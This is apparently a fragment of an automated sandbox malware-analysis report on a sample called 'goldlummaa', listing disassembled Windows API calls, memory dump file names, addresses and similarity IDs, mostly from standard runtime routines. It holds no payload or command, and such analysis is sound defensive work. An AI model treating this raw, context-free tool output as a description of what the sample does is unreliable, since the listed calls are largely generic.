                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2261580123-0
                                                                                                                  APIs
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000), ref: 00C6FD17
                                                                                                                  • GetLastError.KERNEL32(?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?,?,?,00C6D9E0,00000000), ref: 00C6FD23
                                                                                                                    • Part of subcall function 00C6FD74: CloseHandle.KERNEL32(FFFFFFFE,00C6FD33,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?,?), ref: 00C6FD84
                                                                                                                  • ___initconout.LIBCMT ref: 00C6FD33
                                                                                                                    • Part of subcall function 00C6FD55: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C6FCF1,00C6F48E,?,?,00C6E09A,?,00000000,00000000,?), ref: 00C6FD68
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?), ref: 00C6FD48
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2744216297-0
                                                                                                                  APIs
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C64F13
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C64F22
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00C64F2B
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00C64F38
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2933794660-0
                                                                                                                  APIs
                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00C68AFE,?,?,00000000,00000000,00000000,?), ref: 00C68C22
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EncodePointer
                                                                                                                  • String ID: MOC$RCC
                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                  APIs
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C686E0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ___except_validate_context_record
                                                                                                                  • String ID: csm$csm
                                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                  • String ID: L
                                                                                                                  • API String ID: 2610073882-2909332022
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4116985748-3916222277